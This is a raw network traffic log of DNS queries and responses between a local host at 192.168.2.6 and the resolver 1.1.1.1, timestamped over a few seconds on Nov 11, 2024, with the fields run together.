                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.790498972 CET6112553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.801723957 CET53611251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.805843115 CET53561051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.808377981 CET53542181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.920854092 CET6430453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.922207117 CET6112953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.926886082 CET4918253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.931875944 CET53611291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.933399916 CET53643041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.937066078 CET53491821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.057504892 CET5700353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.063374996 CET5366953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.088628054 CET53570031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.096407890 CET53536691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.165766954 CET5542353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.168313026 CET5512253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.169126034 CET5906153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.170454979 CET6118753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.171200991 CET6022853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.171900034 CET6085353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.172735929 CET6036053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.173531055 CET6493553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174280882 CET5263053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174395084 CET5796653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174810886 CET5488053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176392078 CET4945453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176708937 CET53554231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176793098 CET4940253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.177299023 CET5673653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.177527905 CET53551221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.179068089 CET53602281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.180121899 CET53590611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.181627989 CET5978053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.181766987 CET53608531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.182116985 CET53603601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.183902979 CET53649351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.184274912 CET53526301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.184457064 CET53494021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.187762022 CET53567361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.188621044 CET53611871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.190769911 CET53597801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.207067966 CET53579661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.207165003 CET53548801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.207477093 CET53494541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.225616932 CET5611753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.225888968 CET4982653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226002932 CET6146353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226181030 CET5964553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226881981 CET5458753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.227183104 CET5541353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.227344990 CET5140053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228296995 CET5174453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228327036 CET5472353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228461027 CET5728453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228517056 CET6394253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228696108 CET4979853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228718996 CET6150453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228851080 CET6418053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.236073017 CET53596451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.236092091 CET53614631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.236262083 CET53554131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.236634016 CET53561171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.237473965 CET53545871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.237483978 CET53497981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.237494946 CET53514001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.237966061 CET53517441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.238720894 CET53547231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.238743067 CET53639421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.238759995 CET53572841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.238769054 CET53641801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.244389057 CET53498261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.246002913 CET53615041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.260668039 CET5944453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.260921001 CET4966353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.261267900 CET6100053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.261545897 CET5309653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262326002 CET5309253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262451887 CET5019353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262777090 CET5531253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263106108 CET6548353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263403893 CET6263453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263465881 CET6175153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.270754099 CET53496631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.271177053 CET53530961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.271583080 CET53610001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.272783041 CET53530921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.273546934 CET53501931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.273751020 CET53617511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.275099039 CET53654831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.292498112 CET53594441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.294217110 CET53553121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.294856071 CET6513553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295133114 CET5180753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295356035 CET53626341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295659065 CET5811453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.296216965 CET5208153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.296726942 CET6167553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.297211885 CET5338653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.297929049 CET5814153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.304152012 CET53518071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.305057049 CET53581141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.306700945 CET53533861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.307013988 CET53581411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312156916 CET5282353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312351942 CET5368353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312582016 CET5436053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.322290897 CET53543601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.327107906 CET53651351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.327133894 CET53520811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.327671051 CET53616751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.330475092 CET53528231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.342123985 CET53536831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.403160095 CET5465153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.403238058 CET6162753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.413613081 CET53546511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.413924932 CET53616271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.151535988 CET5856253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.152921915 CET4954353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.158427954 CET5849253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.162116051 CET53585621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.166302919 CET5128753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.166543961 CET6447153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.168385983 CET53495431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.170962095 CET53584921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.172735929 CET6416153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.174266100 CET5751453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.177658081 CET5016553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.177833080 CET5774753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.179898024 CET53644711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.181812048 CET5362253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.186533928 CET53575141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.186717033 CET6079753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.187522888 CET53512871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.188462019 CET53501651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.189088106 CET53577471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.192011118 CET5941953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.192080975 CET53536221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.193260908 CET5851253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.194021940 CET6043153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.194273949 CET5402953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.195256948 CET5510753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.195637941 CET6380253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.195959091 CET53607971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.197156906 CET5926853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.204858065 CET53594191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.205200911 CET5678653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.205535889 CET6418153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.205991983 CET53641611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.206208944 CET53604311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.206525087 CET53540291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.208868980 CET53638021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.210553885 CET53592681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.214813948 CET53585121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.220187902 CET53641811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.229579926 CET53551071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.233031988 CET5524753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.233299971 CET6271553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.233489037 CET6489253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.234206915 CET6452253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.234489918 CET6453353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.234659910 CET5344153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.234931946 CET5681453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.235079050 CET5619753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.235327959 CET6226053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.235763073 CET5609553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236223936 CET6432753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236265898 CET5816853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236494064 CET4999953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236588001 CET5902153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236764908 CET5656153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236876011 CET4965753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.237044096 CET6298953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.237140894 CET5279753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.237397909 CET5949053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.238645077 CET53567861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.245757103 CET53648921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.246741056 CET53645221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.247517109 CET53645331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.247930050 CET53622601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.247941017 CET53534411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.248141050 CET53643271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.248614073 CET53590211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.249864101 CET53629891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.249880075 CET53581681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.249916077 CET53565611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.249926090 CET53496571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.251729965 CET6462753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.251810074 CET5884153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.252093077 CET6328253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.252381086 CET5201853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.252417088 CET5751253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.252752066 CET5680853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.256707907 CET53560951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.260767937 CET6552653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.261311054 CET5810453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.261496067 CET5132653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.264374971 CET53646271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.264573097 CET53575121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.265142918 CET53588411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.266032934 CET53520181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.266828060 CET53627151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.266836882 CET53552471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.267081022 CET53568141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.268475056 CET6108353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.268645048 CET6281553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.268918991 CET5315353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.268948078 CET53561971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.269992113 CET53499991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.271554947 CET6391653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.271820068 CET5017653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.272075891 CET6030053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.272083998 CET53581041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.272151947 CET53594901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.273137093 CET53527971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.274604082 CET53568081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.275367975 CET5161853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.276624918 CET6013553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.276885986 CET4939353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.277121067 CET53628151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.280313969 CET53531531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.282668114 CET53603001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.284132957 CET53639161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.284547091 CET53516181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.285295010 CET53632821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.286379099 CET53493931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.289562941 CET53601351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.292737007 CET53513261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.294053078 CET53655261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.295135021 CET6337553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.301151991 CET53610831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.304049015 CET53501761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.329319954 CET53633751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.787137985 CET6450653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.788686037 CET5710453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.788836956 CET5169453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.789309025 CET5561653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.790327072 CET5497753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.791728020 CET5443053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.791728020 CET5868753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.792277098 CET4943653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.792846918 CET6058053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.792846918 CET6411753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.793204069 CET5810353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.793771982 CET6515053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.794197083 CET5895653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.794801950 CET6253753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.795169115 CET5106253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.795607090 CET6180553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.795789957 CET6234153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.796120882 CET5954053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.796406031 CET5590053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.796690941 CET5503953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.796818972 CET53645061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.797195911 CET6395453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.797195911 CET5062653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.797676086 CET5099553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798096895 CET5840153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798096895 CET5989253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798283100 CET5015353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798693895 CET5376153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798705101 CET53516941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798749924 CET6484253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798891068 CET53556161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.799475908 CET5318553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.800148010 CET5329453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.801450014 CET5111853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.801615000 CET53605801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.801682949 CET53544301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.802614927 CET53510621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.803637981 CET53589561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.803755999 CET53581031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.805521011 CET53651501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.805917978 CET53618051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.806010008 CET53623411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.807096958 CET53550391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.807652950 CET53584011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.807698011 CET53501531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.807971001 CET53639541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.808358908 CET53549771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.809338093 CET53648421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.809385061 CET53537611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.809393883 CET53598921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.811021090 CET53511181.1.1.1192.168.2.6
